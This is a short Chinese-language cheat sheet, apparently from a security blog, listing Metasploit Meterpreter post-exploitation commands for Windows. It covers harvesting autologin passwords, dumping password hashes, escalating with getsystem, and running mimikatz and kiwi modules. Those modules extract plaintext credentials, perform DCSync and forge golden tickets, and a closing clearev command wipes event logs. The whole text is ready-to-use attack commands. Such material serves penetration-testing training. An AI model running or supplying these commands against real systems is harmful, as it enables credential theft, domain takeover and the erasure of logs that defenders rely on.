Metasploit
一. 基础
1. 抓取自动登录的密码
run windows/gather/credentials/windows_autologin
2. 未提权可以使用此命令查询hashdump
run windows/gather/smart_hashdump
3. 提权
getsystem
4. 提权后可执行 run hashdump 获取密码
run hashdump
二. mimikatz模块
1. 加载mimikatz模块获取更多权限
ps:mimikatz模块已经合并为kiwi模块
load mimikatz
kerberos:kerberos相关的模块livessp:尝试检索livessp凭据mimikatz_command:运行一个定制的命令msv:msv凭证相关的模块,列出目标主机的用户密码哈希ssp:ssp凭证相关的模块tspkg:tspkg凭证相关的模块wdigest:wdigest凭证相关的模块
使用 mimikatz_command 命令获取明文密码
mimikatz_command -f sekurlsa::searchPasswords
三. kiwi模块
1. 比 mimikatz 更强大的 kiwi 模块
load kiwicreds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
2. creds_all 命令直接获取密码
creds_all
3. kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
清除事件日志
clearev
摘要:谢公子学安全